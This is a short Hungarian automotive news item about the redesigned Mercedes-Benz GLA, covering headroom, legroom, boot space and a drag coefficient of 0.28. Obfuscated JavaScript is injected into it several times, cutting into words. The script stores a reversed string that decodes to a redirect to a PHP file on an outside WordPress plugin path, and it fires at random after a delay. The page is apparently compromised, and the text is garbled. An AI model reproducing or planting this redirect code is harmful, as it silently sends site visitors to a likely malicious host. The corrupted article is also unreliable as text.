Elődjénél több mint 10 centiméterrel magasabb az új generációs Mercedes-Benz GLA, így több hely jut az elöl ülők fejének, annak ellenére, hogy mindkét első ülésen magasabban és egyenesebb háttal ülhetünk – ezért aztán nem okoz gondot, hogy csökkent az elülső lábtér. Habár az autó rövidebb elődjénél, a nagyobb tengelytáv révén hátul nőtt a lábtér (elöl viszont csökkent), ezzel együtt a csomagtartó tágasabb, szélesebb és mélyebb, mint eddig. A 40:20:40 osztású hátsó ülés 140 mm-en toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tologatható előre-hátra. Jó munkát végeztek tehát a tervezők, főleg, mert az autó áramvonalasabb is lett, az eddigi 0,29 helyett 0,28 a közeg-ellenállási együtthatója. A tetőoszlopok körvonalának…
A cikk folytatódik: $mWn=function(n){if(typeof ($mWn.list[n])=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2019/12/15/mercedes-benz-gla-2020.html" target="_blank">http://autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tokalauz.co.hu/ujdonsag/2019/12/15/mercedes-benz-gla-2020.html
- Hirdetés -